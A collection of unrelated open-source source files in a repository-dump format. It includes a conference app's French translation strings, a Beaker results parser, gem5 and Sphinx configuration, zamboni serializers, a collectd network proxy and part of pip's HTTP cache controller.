'Submit a Talk Proposal': 'Soumettre une proposition pour une présentation',
'Submitted Sponsors': 'Submitted Sponsors',
'Subtitle': 'Subtitle',
'Summary': 'Summary',
'Summit': 'Summit',
'summit': 'summit',
'Sure you want to delete this object?': 'Voulez-vous vraiment supprimer cet objet?',
't-shirt': 't-shirt',
'T-shirt Size': 'Grandeur du tee-shirt',
't-shirt, catering and other extra goodies': 't-shirt, catering and other extra goodies',
't-shirt, catering, closing party, pro listing (micro-sponsor: logo in badge and web site), and other extra goodies': 't-shirt, catering, closing party, pro listing (micro-sponsor: logo in badge and web site), and other extra goodies',
'Table': 'Table',
'talk': 'talk',
'Talk Info': 'Information à propos de la présentation',
'Talk Proposal': 'Proposition de présentation',
'Talk Proposals': 'Talk Proposals',
'text': 'text',
'Thanks for joining the partakers list': 'Thanks for joining the partakers list',
'The activity %(activity)s received a comment': 'The activity %(activity)s received a comment',
'The activity %(activity)s was confirmed': 'The activity %(activity)s was confirmed',
'The Financial Aid request process is described here:': "Le processus de demande d'aide financière est décrite ici:",
'The map below shows the home location of all attendees who agreed to make their information public.': "La carte ci-dessous montre l'emplacement d'origine de tous les participants qui ont accepté de rendre leur information publique.",
'The payment process has failed.': 'The payment process has failed.',
'There are errors in your form below': 'Il y a des erreurs dans votre formulaire ci-dessous',
'This information will be encoded on your badge and can be provided to sponsors and exhibitors in the expo hall. These fields are optional unless otherwise noted. Mailing address information is required to send receipts for PSF donations.': "Ces informations seront écrites sur votre porte-nom et peuvent être fournies aux commanditaires et aux exposants dans le hall d'expo. Ces champs sont facultatifs, sauf avec indication contraire. Votre adresse de correspondance est nécessaire pour recevoir un reçu de don au PSF. :",
'this invoice': 'cette facture',
'Time': 'Time',
'Time extension': 'Time extension',
'Time left': 'Time left',
'Time to Pay!': "C'est le temps de payer!",
'Timeline': 'Timeline',
'Timetable': 'Timetable',
'TIP: To change the sort order of the tables, click over the column headers': 'TIP: To change the sort order of the tables, click over the column headers',
'Title': 'Title',
'To': 'À',
'to your payment': 'votre paiement',
'Toggle Editor': 'Toggle Editor',
'Total Amount Billed': 'Montant facturé',
'Total Amount Received': 'Montant reçu',
'Total Amount Still Due': 'Montant dû',
'Track': 'Track',
'Transfer cancelled': 'Transfert annulé',
'Transfers Balance From': 'Formulaire de transfert du solde de compte',
'Traveling': 'Traveling',
'Tutorial': 'Tutorial',
'tutorial': 'tutorial',
'Tutorials': 'Leçons',
'Tutorials Only (early), $80': 'Leçons seulement (tôt), 80 $',
'Tutorials Only (on site), $120': 'Leçons seulement (sur le site), 120 $',
'Tutorials Only (regular), $100': 'Leçons seulement (régulier), 100 $',
'Tutorials+food': 'Tutorials+food',
'Tweet feature disabled (user not logged in)': 'Tweet feature disabled (user not logged in)',
'Twitter username': 'Twitter username',
'Type': 'Type',
'Type in the box the tokens of the people you want to pay the balance from. You can insert multiple tokens separated by a comma. They can find their tokens on the [PAY NOW] page.': 'Vous pouvez payer le solde de compte des autres en tapant leur numéro de jeton de paiement dans le champ qui suit. Vous pouvez insérer plusieurs jetons à la fois en les séparant par une virgule. Les participants pour lesquels vous payez peuvent trouver leurs jetons de paiement sur la page de paiement nommé <<PAYEZ MAINTENANT>>. :',
'Type of notification': 'Type of notification',
'Type of operation': 'Type of operation',
'Unable to download because:': 'Unable to download because:',
'Unable to download tweets:': 'Unable to download tweets:',
'unable to parse csv file': "impossible d'analyser le fichier CSV",
'unable to retrieve data': 'impossible de récupérer les données',
'Unconfirmed activities are shown shaded until author confirm scheduled date, time and room.': 'Unconfirmed activities are shown shaded until author confirm scheduled date, time and room.',
'Unconfirmed activities are shown shaded until author confirms scheduled date, time and room.': 'Unconfirmed activities are shown shaded until author confirms scheduled date, time and room.',
'Unsure': 'Incertain',
'Update my project application': 'Update my project application',
'Update Record': 'Mes à jour ce dossier',
'Update result': 'Update result',
'Update this Activity Proposal': 'Update this Activity Proposal',
'Update this Talk Proposal': 'Mes à jour cette proposition de présentation',
'Updated %s operations': 'Updated %s operations',
'Upload': 'Upload',
'USD': 'USD',
'user': 'user',
'User': 'User',
'User %(created_signature)s on %(created_on)s says: %(body)s': 'User %(created_signature)s on %(created_on)s says: %(body)s',
'User Votes': 'User Votes',
'Username': 'Username',
'Value': 'Value',
'Value or record reference': 'Value or record reference',
'vegan': 'végétalien(ne) intégral(e)',
'vegetarian': 'végétarien(ne)',
'Venue': 'Venue',
'Video': 'Video',
'View': 'View',
'Viewing page version: %s': 'Viewing page version: %s',
'Volunteer': 'Volunteer',
'Voting': 'Voting',
'Voting is disabled': 'Voting is disabled',
'Voting is not allowed yet': 'Voting is not allowed yet',
'Voto Aceptado!': 'Voto Aceptado!',
'Warning': 'Warning',
'web2conf': 'web2conf',
'Welcome to PyCon': 'Bienvenue à PyCon',
"Whats's included?": "Whats's included?",
'WIKI format: ': 'WIKI format: ',
"women's/large": 'pour femme/large',
"women's/medium": 'pour femme/moyen',
"women's/small": 'pour femme/petit',
'Workshop': 'Workshop',
'workshop': 'workshop',
"Write a comment for the project's owner": "Write a comment for the project's owner",
'xlarge': 'xlarge',
'xxlarge': 'xxlarge',
'xxxlarge': 'xxxlarge',
'Yes. Give them your "payment token":': 'Oui. Donnez-leur votre <<jeton de paiement>> :',
'You can only choose one tutorial per each session': 'You can only choose one tutorial per each session',
'You can only choose tutorial per each session': 'Vous pouvez seulement choisir une leçon par session :',
'You can pay register somebody else here and transfer their balance. Make sure the email address is correct or they will be unable to change tutorials of update profile. You can register multiple attendees one at the time.': "Vous pouvez payer pour inscrire quelqu'un d'autre ici et transférer leur solde de compte. Assurez-vous que leur adresse de courriel est correcte ou ils ne seront pas capables de mettre à jour leur choix de leçons et leur profil personnel. Vous pouvez inscrire plusieurs participants, un à la fois. :",
'You can pay somebody else\'s conference fees by transferring their balance. The transfer is pending until you pay your conference fees. To transfer the balance type below the "payment token" for the registrants, separated by a comma': "Vous pouvez payer les frais de conférence des autres en transférant leur solde de compte. Le transfert sera en attente jusqu'à ce que vous payiez vos frais d'inscription. Pour transférer les soldes, veillez taper ci-après le numéro de <<jeton de paiement>> pour chacune des personnes. Les numéros devraient être séparés par des virgules :",
'You can register somebody else here and transfer their balance. Be sure their email address is correct - it is required to verify registration and to log on. You can register multiple attendees one at the time.': "Vous pouvez inscrire quelqu'un d'autre ici et transférer leur solde de compte. Assurez-vous que leur adresse de courriel soit correcte. L'adresse est nécessaire pour vérifier l'enregistrement et pour ouvrir une session. Vous pouvez inscrire plusieurs participants, un à la fois. :",
'You can tweet here': 'You can tweet here',
'You can use markmin syntax here': 'You can use markmin syntax here',
'You dismissed the project': 'You dismissed the project',
'You have %s payments generated, click here to see the status': 'You have %s payments generated, click here to see the status',
'You have a credit of': 'Vous avez un crédit de',
'You have not paid for your registration; the cost is': "Vous n'avez pas payé votre inscription, le coût est :",
'You have successfully finished the payment process. Thanks you.': 'You have successfully finished the payment process. Thanks you.',
'You joined': 'You joined',
'Your Activities': 'Your Activities',
'Your activity %(activity)s has been confirmed.\nYou can access the current activity information at %(link)s': 'Your activity %(activity)s has been confirmed.\nYou can access the current activity information at %(link)s',
'Your activity %(activity)s received a comment by %(user)s:\n%(comment)s\n': 'Your activity %(activity)s received a comment by %(user)s:\n%(comment)s\n',
'Your activity proposal %(activity)s has been recorded.\nYou can access the current activity information at %(link)s\nThank you': 'Your activity proposal %(activity)s has been recorded.\nYou can access the current activity information at %(link)s\nThank you',
'Your balance will be updated when the check is received and cashed.': 'Votre solde sera mis à jour lorsque le chèque est reçu et encaissé. :',
'Your conference fees': "Vos frais d'inscription",
'Your current balance': 'Votre solde de compte',
"Your current granted permisions doesn't not give access to the requested resource": "Your current granted permisions doesn't not give access to the requested resource",
'Your donation': 'Votre don',
'Your new password is %(password)s': 'Your new password is %(password)s',
'Your payment has been generated!': 'Your payment has been generated!',
'Your payment is being processed... (read below)': 'Votre paiement est en cours de traitement... (lire ci-dessous) :',
'Your picture (100px)': 'Your picture (100px)',
'Your picture (for authors)': 'Your picture (for authors)',
'Your picture 100px': 'Your picture 100px',
"Your project's info was updated": "Your project's info was updated",
'Your request could not be processed due to maintenance issues': 'Your request could not be processed due to maintenance issues',
'Your Talks': 'Your Talks',
'Zip/Postal Code': 'Code postal',
}
|
omaciel/automation-tools | refs/heads/master | automation_tools/beaker.py | 12 | """Tools to work with Beaker (https://beaker-project.org/).
The ``bkr`` command-line utility must be available and configured. (Available
via the ``beaker-client`` package on Fedora.) See the `Installing and
configuring the client`_ section of the Beaker documentation.
.. _Installing and configuring the client:
https://beaker-project.org/docs/user-guide/bkr-client.html#installing-and-configuring-the-client
"""
import pprint
import subprocess
import xml.dom.minidom
def main():
"""Run :func:`beaker_jobid_to_system_info` and print the response."""
pprint.pprint(beaker_jobid_to_system_info(open('a.xml')))
def _beaker_process_recipe(recipe):
"""Process recipe and return info about it
:param recipe: recipe (or guestrecipe) element to process
"""
recipe_info = {}
res_task = False
res_tag = False
recipe_info['id'] = int(recipe.attributes['id'].value)
recipe_info['system'] = recipe.attributes['system'].value
recipe_info['arch'] = recipe.attributes['arch'].value
recipe_info['distro'] = recipe.attributes['distro'].value
recipe_info['variant'] = recipe.attributes['variant'].value
# Do we have /distribution/reservesys? If so, status is based on that.
tasks = recipe.getElementsByTagName('task')
for task in reversed(tasks):
if task.attributes['name'].value == '/distribution/reservesys':
res_task = True
res_task_element = task
break
# Do we have <reservesys>? If so, status is recipe.status.
reservesyss = recipe.getElementsByTagName('reservesys')
for _ in reservesyss:
res_tag = True
break
# Determine status of the recipe/system reservation
if res_tag and not res_task:
recipe_info['reservation'] = recipe.attributes['status'].value
elif res_task and not res_tag:
recipe_info['reservation'] = \
res_task_element.attributes['status'].value
elif res_task and res_tag:
recipe_info['reservation'] = (
'ERROR: Looks like the recipe for this system have too many '
'methods to reserve. Do not know what happens.'
)
else:
recipe_info['reservation'] = recipe.attributes['status'].value
return recipe_info
def beaker_jobid_to_system_info(job_id):
"""Get system reservation task status (plus other info) based on
Beaker ``job_id``.
This function requires configured bkr utility. We parse everithing from
``bkr job-results [--prettyxml] J:123456``, so if you see some breakage,
please capture that output.
For testing putposes, if you provide file descriptor instead of ``job_id``,
XML will be loaded from there.
:param job_id: The ID of a Beaker job. For example: 'J:123456'
"""
systems = []
# Get XML with job results and create DOM object
if hasattr(job_id, 'read'):
dom = xml.dom.minidom.parse(job_id)
else:
out = subprocess.check_output(['bkr', 'job-results', job_id])
dom = xml.dom.minidom.parseString(out)
# Parse the DOM object. The XML have structure like this (all elements
# except '<job>' can appear more times):
# <job id='123' ...
# <recipeSet id='456' ...
# <recipe id='789' system='some.system.example.com'
# status='Reserved' ...
# <recipe id='790' system='another.system.example.com'
# status='Completed' ...
# <guestrecipe id='147258' ...
# </recipeSet>
# <recipeSet id='457' ...
# ...
jobs = dom.getElementsByTagName('job')
for job in jobs:
recipe_sets = job.getElementsByTagName('recipeSet')
for recipe_set in recipe_sets:
recipes = recipe_set.getElementsByTagName('recipe')
for recipe in recipes:
systems.append(_beaker_process_recipe(recipe))
guestrecipes = recipe.getElementsByTagName('guestrecipe')
for guestrecipe in guestrecipes:
systems.append(_beaker_process_recipe(guestrecipe))
return systems
if __name__ == '__main__':
main()
|
rjschof/gem5 | refs/heads/master | src/cpu/kvm/KvmVM.py | 57 | # Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Sandberg
from m5.params import *
from m5.proxy import *
from m5.SimObject import SimObject
class KvmVM(SimObject):
type = 'KvmVM'
cxx_header = "cpu/kvm/vm.hh"
system = Param.System(Parent.any, "system object")
coalescedMMIO = VectorParam.AddrRange([], "memory ranges for coalesced MMIO")
|
artmusic0/theano-learning.part02 | refs/heads/master | fixed_official_convolutional_vv1(self_mnist)/doc/conf.py | 35 | # -*- coding: utf-8 -*-
#
# theano documentation build configuration file, created by
# sphinx-quickstart on Tue Oct 7 16:34:06 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.todo']
try:
from sphinx.ext import pngmath
extensions.append('sphinx.ext.pngmath')
except ImportError:
print >>sys.stderr, 'Warning: could not import sphinx.ext.pngmath'
pass
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The master toctree document.
master_doc = 'contents'
# General substitutions.
project = 'DeepLearning'
copyright = '2008--2010, LISA lab'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_dirs = ['scripts']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
#html_style = 'default.css'
html_theme = 'sphinxdoc'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['.static', 'images']
html_static_path = ['images']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_use_modindex = True
# If false, no index is generated.
html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'deeplearningdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
latex_font_size = '11pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('contents', 'deeplearning.tex', 'Deep Learning Tutorial',
'LISA lab, University of Montreal', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
default_role = 'math'
pngmath_divpng_args = ['-gamma 1.5','-D 110']
pngmath_latex_preamble = '\\usepackage{amsmath}\n'+\
'\\usepackage{amsfonts}\n'+\
'\\usepackage{amssymb}\n'+\
'\\def\\E{\\mathbf{E}}\n'+\
'\\def\\F{\\mathbf{F}}\n'+\
'\\def\\x{\\mathbf{x}}\n'+\
'\\def\\h{\\mathbf{h}}\n'+\
'\\def\\v{\\mathbf{v}}\n'+\
'\\def\\nv{\\mathbf{v^{{\bf -}}}}\n'+\
'\\def\\nh{\\mathbf{h^{{\bf -}}}}\n'+\
'\\def\\s{\\mathbf{s}}\n'+\
'\\def\\b{\\mathbf{b}}\n'+\
'\\def\\c{\\mathbf{c}}\n'+\
'\\def\\W{\\mathbf{W}}\n'+\
'\\def\\C{\\mathbf{C}}\n'+\
'\\def\\P{\\mathbf{P}}\n'+\
'\\def\\T{{\\bf \\mathcal T}}\n'+\
'\\def\\B{{\\bf \\mathcal B}}\n'
|
tsl143/zamboni | refs/heads/master | mkt/reviewers/serializers.py | 13 | from rest_framework import serializers
from mkt.api.fields import TranslationSerializerField
from mkt.reviewers.models import (AdditionalReview, CannedResponse,
QUEUE_TARAKO, ReviewerScore)
from mkt.webapps.models import Webapp
from mkt.webapps.serializers import ESAppSerializer
class ReviewingSerializer(serializers.ModelSerializer):
class Meta:
model = Webapp
fields = ('resource_uri', )
resource_uri = serializers.HyperlinkedRelatedField(view_name='app-detail',
read_only=True,
source='*')
SEARCH_FIELDS = [u'device_types', u'id', u'is_escalated', u'is_packaged',
u'name', u'premium_type', u'price', u'slug', u'status']
class ReviewersESAppSerializer(ESAppSerializer):
latest_version = serializers.SerializerMethodField('get_latest_version')
is_escalated = serializers.BooleanField()
class Meta(ESAppSerializer.Meta):
fields = SEARCH_FIELDS + ['latest_version', 'is_escalated']
def get_latest_version(self, obj):
v = obj.es_data.latest_version
return {
'has_editor_comment': v.has_editor_comment,
'has_info_request': v.has_info_request,
'is_privileged': v.is_privileged,
'status': v.status,
}
class AdditionalReviewSerializer(serializers.ModelSerializer):
"""Developer facing AdditionalReview serializer."""
app = serializers.PrimaryKeyRelatedField()
comment = serializers.CharField(max_length=255, read_only=True)
class Meta:
model = AdditionalReview
fields = ['id', 'app', 'queue', 'passed', 'created', 'modified',
'review_completed', 'comment']
# Everything is read-only.
read_only_fields = ['id', 'passed', 'created', 'modified',
'review_completed', 'reviewer']
def pending_review_exists(self, queue, app_id):
return (AdditionalReview.objects.unreviewed(queue=queue)
.filter(app_id=app_id)
.exists())
def validate_queue(self, attrs, source):
if attrs[source] != QUEUE_TARAKO:
raise serializers.ValidationError('is not a valid choice')
return attrs
def validate_app(self, attrs, source):
queue = attrs.get('queue')
app = attrs.get('app')
if queue and app and self.pending_review_exists(queue, app):
raise serializers.ValidationError('has a pending review')
return attrs
class ReviewerAdditionalReviewSerializer(AdditionalReviewSerializer):
"""Reviewer facing AdditionalReview serializer."""
comment = serializers.CharField(max_length=255, required=False)
class Meta:
model = AdditionalReview
fields = AdditionalReviewSerializer.Meta.fields
read_only_fields = list(
set(AdditionalReviewSerializer.Meta.read_only_fields) -
set(['passed', 'reviewer']))
def validate(self, attrs):
if self.object.passed is not None:
raise serializers.ValidationError('has already been reviewed')
elif attrs.get('passed') not in (True, False):
raise serializers.ValidationError('passed must be a boolean value')
else:
return attrs
class CannedResponseSerializer(serializers.ModelSerializer):
name = TranslationSerializerField(required=True)
response = TranslationSerializerField(required=True)
class Meta:
model = CannedResponse
class ReviewerScoreSerializer(serializers.ModelSerializer):
class Meta:
model = ReviewerScore
fields = ['id', 'note', 'user', 'score']
def validate_note(self, attrs, source):
# If note is absent but DRF tries to validate it (because we're dealing
# with a PUT or POST), then add a blank one.
if source not in attrs:
attrs[source] = ''
return attrs
|
mirchr/collectd | refs/heads/master | contrib/network-proxy.py | 105 | #!/usr/bin/env python
# vim: sts=4 sw=4 et
# Simple unicast proxy to send collectd traffic to another host/port.
# Copyright (C) 2007 Pavel Shramov <shramov at mexmat.net>
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; only version 2 of the License is applicable.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 59 Temple
# Place, Suite 330, Boston, MA 02111-1307 USA
"""
Simple unicast proxy for collectd (>= 4.0).
Binds to 'local' address and forwards all traffic to 'remote'.
"""
import socket
import struct
""" Local multicast group/port"""
local = ("239.192.74.66", 25826)
""" Address to send packets """
remote = ("grid.pp.ru", 35826)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
mreq = struct.pack("4sl", socket.inet_aton(local[0]), socket.INADDR_ANY)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_LOOP, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
sock.bind(local)
out = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
if __name__ == "__main__":
while True:
(buf, addr) = sock.recvfrom(2048)
sock.sendto(buf, remote)
|
mdworks2016/work_development | refs/heads/master | Python/20_Third_Certification/venv/lib/python3.7/site-packages/pip/_vendor/cachecontrol/controller.py | 28 | """
The httplib2 algorithms ported for use with requests.
"""
import logging
import re
import calendar
import time
from email.utils import parsedate_tz
from pip._vendor.requests.structures import CaseInsensitiveDict
from .cache import DictCache
from .serialize import Serializer
logger = logging.getLogger(__name__)
URI = re.compile(r"^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?")
def parse_uri(uri):
"""Parses a URI using the regex given in Appendix B of RFC 3986.
(scheme, authority, path, query, fragment) = parse_uri(uri)
"""
groups = URI.match(uri).groups()
return (groups[1], groups[3], groups[4], groups[6], groups[8])
class CacheController(object):
"""An interface to see if request should cached or not.
"""
def __init__(
self, cache=None, cache_etags=True, serializer=None, status_codes=None
):
self.cache = DictCache() if cache is None else cache
self.cache_etags = cache_etags
self.serializer = serializer or Serializer()
self.cacheable_status_codes = status_codes or (200, 203, 300, 301)
@classmethod
def _urlnorm(cls, uri):
"""Normalize the URL to create a safe key for the cache"""
(scheme, authority, path, query, fragment) = parse_uri(uri)
if not scheme or not authority:
raise Exception("Only absolute URIs are allowed. uri = %s" % uri)
scheme = scheme.lower()
authority = authority.lower()
if not path:
path = "/"
# Could do syntax based normalization of the URI before
# computing the digest. See Section 6.2.2 of Std 66.
request_uri = query and "?".join([path, query]) or path
defrag_uri = scheme + "://" + authority + request_uri
return defrag_uri
@classmethod
def cache_url(cls, uri):
return cls._urlnorm(uri)
def parse_cache_control(self, headers):
known_directives = {
# https://tools.ietf.org/html/rfc7234#section-5.2
"max-age": (int, True),
"max-stale": (int, False),
"min-fresh": (int, True),
"no-cache": (None, False),
"no-store": (None, False),
"no-transform": (None, False),
"only-if-cached": (None, False),
"must-revalidate": (None, False),
"public": (None, False),
"private": (None, False),
"proxy-revalidate": (None, False),
"s-maxage": (int, True),
}
cc_headers = headers.get("cache-control", headers.get("Cache-Control", ""))
retval = {}
for cc_directive in cc_headers.split(","):
if not cc_directive.strip():
continue
parts = cc_directive.split("=", 1)
directive = parts[0].strip()
try:
typ, required = known_directives[directive]
except KeyError:
logger.debug("Ignoring unknown cache-control directive: %s", directive)
continue
if not typ or not required:
retval[directive] = None
if typ:
try:
retval[directive] = typ(parts[1].strip())
except IndexError:
if required:
logger.debug(
"Missing value for cache-control " "directive: %s",
directive,
)
except ValueError:
logger.debug(
"Invalid value for cache-control directive " "%s, must be %s",
directive,
typ.__name__,
)
return retval
def cached_request(self, request):
"""
Return a cached response if it exists in the cache, otherwise
return False.
"""
cache_url = self.cache_url(request.url)
logger.debug('Looking up "%s" in the cache', cache_url)
cc = self.parse_cache_control(request.headers)
# Bail out if the request insists on fresh data
if "no-cache" in cc:
logger.debug('Request header has "no-cache", cache bypassed')
return False
if "max-age" in cc and cc["max-age"] == 0:
logger.debug('Request header has "max_age" as 0, cache bypassed')
return False
# Request allows serving from the cache, let's see if we find something
cache_data = self.cache.get(cache_url)
if cache_data is None:
logger.debug("No cache entry available")
return False
# Check whether it can be deserialized
resp = self.serializer.loads(request, cache_data)
if not resp:
logger.warning("Cache entry deserialization failed, entry ignored")
return False
# If we have a cached 301, return it immediately. We don't
# need to test our response for other headers b/c it is
# intrinsically "cacheable" as it is Permanent.
# See:
# https://tools.ietf.org/html/rfc7231#section-6.4.2
#
# Client can try to refresh the value by repeating the request
# with cache busting headers as usual (ie no-cache).
if resp.status == 301:
msg = (
'Returning cached "301 Moved Permanently" response '
"(ignoring date and etag information)"
)
logger.debug(msg)
return resp
headers = CaseInsensitiveDict(resp.headers)
if not headers or "date" not in headers:
if "etag" not in headers:
# Without date or etag, the cached response can never be used
# and should be deleted.
logger.debug("Purging cached response: no date or etag")
self.cache.delete(cache_url)
logger.debug("Ignoring cached response: no date")
return False
now = time.time()
date = calendar.timegm(parsedate_tz(headers["date"]))
current_age = max(0, now - date)
logger.debug("Current age based on date: %i", current_age)
# TODO: There is an assumption that the result will be a
# urllib3 response object. This may not be best since we
# could probably avoid instantiating or constructing the
# response until we know we need it.
resp_cc = self.parse_cache_control(headers)
# determine freshness
freshness_lifetime = 0
# Check the max-age pragma in the cache control header
if "max-age" in resp_cc:
freshness_lifetime = resp_cc["max-age"]
logger.debug("Freshness lifetime from max-age: %i", freshness_lifetime)
# If there isn't a max-age, check for an expires header
elif "expires" in headers:
expires = parsedate_tz(headers["expires"])
if expires is not None:
expire_time = calendar.timegm(expires) - date
freshness_lifetime = max(0, expire_time)
logger.debug("Freshness lifetime from expires: %i", freshness_lifetime)
# Determine if we are setting freshness limit in the
# request. Note, this overrides what was in the response.
if "max-age" in cc:
freshness_lifetime = cc["max-age"]
logger.debug(
"Freshness lifetime from request max-age: %i", freshness_lifetime
)
if "min-fresh" in cc:
min_fresh = cc["min-fresh"]
# adjust our current age by our min fresh
current_age += min_fresh
logger.debug("Adjusted current age from min-fresh: %i", current_age)
# Return entry if it is fresh enough
if freshness_lifetime > current_age:
logger.debug('The response is "fresh", returning cached response')
logger.debug("%i > %i", freshness_lifetime, current_age)
return resp
# we're not fresh. If we don't have an Etag, clear it out
if "etag" not in headers:
logger.debug('The cached response is "stale" with no etag, purging')
self.cache.delete(cache_url)
# return the original handler
return False
def conditional_headers(self, request):
cache_url = self.cache_url(request.url)
resp = self.serializer.loads(request, self.cache.get(cache_url))
new_headers = {}
if resp:
headers = CaseInsensitiveDict(resp.headers)
if "etag" in headers:
new_headers["If-None-Match"] = headers["ETag"]
if "last-modified" in headers:
new_headers["If-Modified-Since"] = headers["Last-Modified"]
return new_headers
def cache_response(self, request, response, body=None, status_codes=None):
"""
Algorithm for caching requests.
This assumes a requests Response object.
"""
# From httplib2: Don't cache 206's since we aren't going to
# handle byte range requests
cacheable_status_codes = status_codes or self.cacheable_status_codes
if response.status not in cacheable_status_codes:
logger.debug(
"Status code %s not in %s", response.status, cacheable_status_codes
)
return
response_headers = CaseInsensitiveDict(response.headers)
# If we've been given a body, our response has a Content-Length, that
# Content-Length is valid then we can check to see if the body we've
# been given matches the expected size, and if it doesn't we'll just
# skip trying to cache it.
if (
body is not None
and "content-length" in response_headers
and response_headers["content-length"].isdigit()
and int(response_headers["content-length"]) != len(body)
):
return
cc_req = self.parse_cache_control(request.headers)
cc = self.parse_cache_control(response_headers)
cache_url = self.cache_url(request.url)
logger.debug('Updating cache with response from "%s"', cache_url)
# Delete it from the cache if we happen to have it stored there
no_store = False
if "no-store" in cc:
no_store = True
logger.debug('Response header has "no-store"')
